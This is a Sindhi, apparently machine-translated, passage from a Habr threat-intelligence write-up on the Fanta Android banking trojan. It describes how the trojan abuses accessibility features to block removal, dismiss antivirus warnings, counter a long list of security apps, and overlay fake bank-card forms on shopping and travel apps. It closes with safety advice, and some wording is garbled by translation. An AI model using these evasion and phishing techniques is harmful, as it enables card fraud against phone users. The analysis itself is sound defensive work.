AccessibilityService جي ڪارڪردگي کي استعمال ڪندي، ٽروجن متاثر ٿيل ڊوائيس جي اسڪرين تي عناصر ۾ تبديلين جي نگراني ڪندو آهي. جيئن اڳ بيان ڪيو ويو آهي، Fanta سيٽنگون هڪ پيراميٽر تي مشتمل هونديون آهن جيڪي ڊائلاگ باڪس سان عملن کي لاگ ان ڪرڻ لاءِ ذميوار هوندا آهن. پڙهو ڊائلاگ. جيڪڏهن هي پيٽرول سيٽ ڪيو ويو آهي، معلومات بابت نالو ۽ پيڪيج جي وضاحت جنهن واقعي کي شروع ڪيو ڊيٽابيس ۾ شامل ڪيو ويندو. ٽرجن ھيٺ ڏنل ڪارناما انجام ڏئي ٿو جڏھن واقعا شروع ٿين ٿا:

هيٺين صورتن ۾ پوئتي ۽ گهر جي چاٻين کي دٻائڻ جو نمونو:
· جيڪڏهن صارف پنهنجي ڊوائيس کي ريبوٽ ڪرڻ چاهي ٿو
· جيڪڏهن صارف "Avito" ايپليڪيشن کي ختم ڪرڻ يا رسائي جي حقن کي تبديل ڪرڻ چاهي ٿو
· جيڪڏهن صفحي تي "Avito" ايپليڪيشن جو ذڪر آهي
· جڏهن کوليو Google Play Protect ايپليڪيشن
· جڏهن صفحا کولڻ سان AccessibilityService سيٽنگون
· جڏهن سسٽم سيڪيورٽي ڊائلاگ باڪس ظاهر ٿئي ٿو
· جڏهن صفحو کولڻ سان "ڊرا اوور ٻي ايپ" سيٽنگون
· جڏهن "ايپليڪيشن" صفحي کي کوليو، "وصولي ۽ ري سيٽ"، "ڊيٽا ري سيٽ"، "سيٽنگون ري سيٽ ڪريو"، "ڊولپر پينل"، "خاص. موقعا“، ”خاص موقعا“، ”خاص حق“
· جيڪڏهن واقعي ڪجهه ايپليڪيشنن پاران ٺاهي وئي هئي.

ايپليڪيشنن جي فهرست
- Android
- ماسٽر لائيٽ
- صاف ماسٽر
- x86 CPU لاءِ صاف ماسٽر
- Meizu ايپليڪيشن جي اجازت جو انتظام
- MIUI سيڪيورٽي
- صاف ماسٽر - اينٽي وائرس ۽ ڪيش ۽ گندگي صاف ڪندڙ
- والدين ڪنٽرول ۽ GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock ۽ ويب سيڪيورٽي بيٽا
- وائرس صاف ڪندڙ، اينٽي وائرس، ڪلينر (MAX سيڪيورٽي)
- موبائل اينٽي وائرس سيڪيورٽي پرو
- Avast اينٽي وائرس ۽ مفت تحفظ 2019
- موبائل سيڪيورٽي MegaFon
- ايڪسپيريا لاءِ AVG تحفظ
- موبائل سيڪيورٽي
- Malwarebytes اينٽي وائرس ۽ تحفظ
- Android 2019 لاءِ اينٽي وائرس
- سيڪيورٽي ماسٽر - اينٽي وائرس، وي پي اين، ايپ لاڪ، بوسٹر
- Huawei ٽيبليٽ سسٽم مئنيجر لاءِ AVG اينٽي وائرس
- Samsung Accessibility
- Samsung Smart Manager
- سيڪيورٽي ماسٽر
- اسپيڊ بوسٽر
- ڊاڪٽر ويب
- ڊاڪٽر ويب سيڪيورٽي اسپيس
- ڊاڪٽر ويب موبائل ڪنٽرول سينٽر
- ڊاڪٽر ويب سيڪيورٽي خلائي زندگي
- ڊاڪٽر ويب موبائل ڪنٽرول سينٽر
- اينٽي وائرس ۽ موبائل سيڪيورٽي
- Kaspersky انٽرنيٽ سيڪيورٽي: اينٽي وائرس ۽ تحفظ
- ڪاسپرسڪي بيٽري لائف: سيور ۽ بوسٹر
- Kaspersky Endpoint Security - تحفظ ۽ انتظام
- AVG اينٽي وائرس مفت 2019 - Android لاءِ تحفظ
- اينٽيوسس Android
- نورٽن موبائل سيڪيورٽي ۽ اينٽي وائرس
- اينٽي وائرس، فائر وال، وي پي اين، موبائل سيڪيورٽي
- موبائل سيڪيورٽي: اينٽي وائرس، وي پي اين، چوري تحفظ
- Android لاءِ اينٽي وائرس
جيڪڏهن اجازت جي درخواست ڪئي وڃي جڏهن هڪ مختصر نمبر تي هڪ ايس ايم ايس پيغام موڪلڻ وقت، فانتا چيڪ بڪس تي ڪلڪ ڪرڻ جي سمجهاڻي ڏئي ٿو اختيار ياد رکو ۽ بٽڻ موڪل.
جڏهن توهان ٽروجن کان ايڊمنسٽريٽر جا حق کسڻ جي ڪوشش ڪندا آهيو، اهو فون اسڪرين کي لاڪ ڪندو آهي.
نون منتظمين کي شامل ڪرڻ کان روڪي ٿو.
جيڪڏهن اينٽي وائرس ايپليڪيشن dr.web هڪ خطرو معلوم ڪيو، Fanta نقل ڪري ٿو بٽڻ کي دٻايو نظرانداز ڪرڻ.
ٽروجن واپس ۽ گهر جي بٽڻ کي دٻائڻ جي صورت ۾، جيڪڏهن واقعي ايپليڪيشن پاران ٺاهي وئي هئي Samsung ڊوائيس سنڀال.
Fanta بئنڪ ڪارڊ بابت معلومات داخل ڪرڻ لاءِ فارمن سان گڏ فشنگ ونڊو ٺاهي ٿي جيڪڏھن اٽڪل 30 مختلف انٽرنيٽ سروسز جي لسٽ مان ڪا ايپليڪيشن شروع ڪئي وئي آھي. انهن مان: AliExpress، بکنگ، Avito، Google Play Market Component، Pandao، Drom Auto، وغيره.

فشنگ فارم

Fanta تجزيو ڪري ٿو ته ڪهڙيون ايپليڪيشنون متاثر ٿيل ڊوائيس تي هلن ٿيون. جيڪڏهن دلچسپي جي درخواست کوليو ويو، ٽرجن ٻين سڀني جي مٿان هڪ فشنگ ونڊو ڏيکاري ٿو، جيڪو بينڪ ڪارڊ جي معلومات داخل ڪرڻ لاء هڪ فارم آهي. استعمال ڪندڙ کي هيٺين ڊيٽا داخل ڪرڻ گهرجي:
- ڪارڊ نمبر
- ڪارڊ جي ختم ٿيڻ جي تاريخ
- سي وي وي
- ڪارڊ هولڊر جو نالو (سڀني بئنڪن لاءِ نه)
هلندڙ ايپليڪيشن تي منحصر ڪري، مختلف فشنگ ونڊوز ڏيکاريا ويندا. انهن مان ڪجهه مثال هيٺ ڏجن ٿا:

ايلي ايڪسپريس:

اٽوو

ڪجھ ٻين ايپليڪيشنن لاءِ، مثال طور Google Play Market, Aviasales, Pandao, Booking, Trivago:

اهو ڪيئن واقعي هو

خوشقسمتيء سان، جيڪو شخص حاصل ڪيو ايس ايم ايس پيغام مضمون جي شروعات ۾ بيان ڪيو ويو آهي سائبر سيڪيورٽي ماهر. تنهن ڪري، حقيقي، غير ڊائريڪٽر جو نسخو هڪ کان مختلف آهي جيڪو اڳ ۾ ٻڌايو ويو آهي: هڪ شخص هڪ دلچسپ ايس ايم ايس وصول ڪيو، جنهن کان پوء هن گروپ-IB خطري جو شڪار انٽيليجنس ٽيم کي ڏنو. حملي جو نتيجو هي مضمون آهي. خوشيءَ جو خاتمو، صحيح؟ بهرحال، سڀئي ڪهاڻيون ايتري ڪاميابيءَ سان ختم نه ٿيون ٿين، ۽ تنهن ڪري توهان جون ڪهاڻيون پئسن جي نقصان سان ڊائريڪٽر جي کٽ وانگر نه لڳيون، اڪثر صورتن ۾ اهو ڪافي آهي ته هيٺ ڏنل ڊگھي بيان ڪيل قاعدن تي عمل ڪريو:
- گوگل پلي کان سواءِ ڪنهن به ذريعن کان Android OS سان موبائل ڊيوائس لاءِ ايپليڪيشن انسٽال نه ڪريو
- ايپليڪيشن کي انسٽال ڪرڻ وقت، ايپليڪيشن پاران درخواست ڪيل حقن تي خاص ڌيان ڏيو
- ڊائون لوڊ ڪيل فائلن جي توسيع تي ڌيان ڏيو
- انسٽال ڪريو Android OS اپڊيٽ باقاعده
- مشڪوڪ وسيلن جو دورو نه ڪريو ۽ اتان کان فائلون ڊائون لوڊ نه ڪريو
- ايس ايم ايس پيغامن ۾ حاصل ڪيل لنڪ تي ڪلڪ نه ڪريو.

جو ذريعو: www.habr.com

Leisya، Fanta: پراڻي Android Trojan جي نئين حڪمت عملي